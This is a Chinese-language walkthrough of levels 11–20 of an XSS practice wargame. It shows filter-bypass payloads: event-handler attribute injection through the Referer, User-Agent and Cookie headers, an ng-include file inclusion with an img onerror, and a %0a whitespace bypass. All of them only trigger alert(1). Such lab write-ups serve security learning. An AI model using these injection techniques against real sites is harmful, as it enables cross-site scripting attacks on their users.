第十一关
检测源代码,发现 input 表单
试试第十关的 ?t_sort=” οnclick=javascript:alert(1) type=”text
发现 ” 被转义
看到 ref 想到 referer
抓包添加 referer ,试试
Referer: 123
发现第四个t_ref有value值了
写入payload <script>alert(1)</script> 试试
发现 < > 没了
用 点击事件
Referer: ” οnclick=javascript:alert(1) type=”text
构造 t_ref 表单
成功通过
第十二关
检测源代码,发现 t_ua 的 value 值很明显为 user-agent
抓包写入<script>alert(1)</script>看看过滤
< >一样没了
试试点击事件
User-Agent: ” οnclick=javascript:alert(1) type=”text
成功通过
第十三关
检测源代码,发现 t_cook,可能为cookie,试试抓包修改cookie值
发现确实cookie处,写入<script>alert(1)</script>看看过滤
< >一样没了
试试点击事件
Cookie: user=” οnclick=javascript:alert(1) type=”text
成功通过
第十四关
emmm,不会
第十五关
检测源代码,看到了个ng-include,相当于文件包含
试试包含第1关的level1.php,因为是地址,所有记得上单引号
构造payload: ?src=’level1.php?name=<img src=1 οnerrοr=alert(1)>’
第十六关
常规输入
<script>alert(1)</script>
发现script没了,试试大小写和双写script,没用
试试
<img src=1 οnerrοr=alert(1)>
发现空格也过滤了,那就绕过咯
%0a 代替空格、
<img%0asrc=1%0aοnerrοr=alert(1)>
第十七关
检测源码,发现了embed标签
这就是个互动的东西,试试<script>alert(1)</script>
发现是html实体编码了< >
也就是说 包含< >的js都不行
试试onclick和onmouseover
οnclick=alert(1)
发现跟前面连起来了,没用触发
前面加个空格试试
οnclick=alert(1)
通过
第十八关
同十七关
第十九和二十关
都是跟flash有关的,现在几乎没用了
我就不弄了(压根不会..)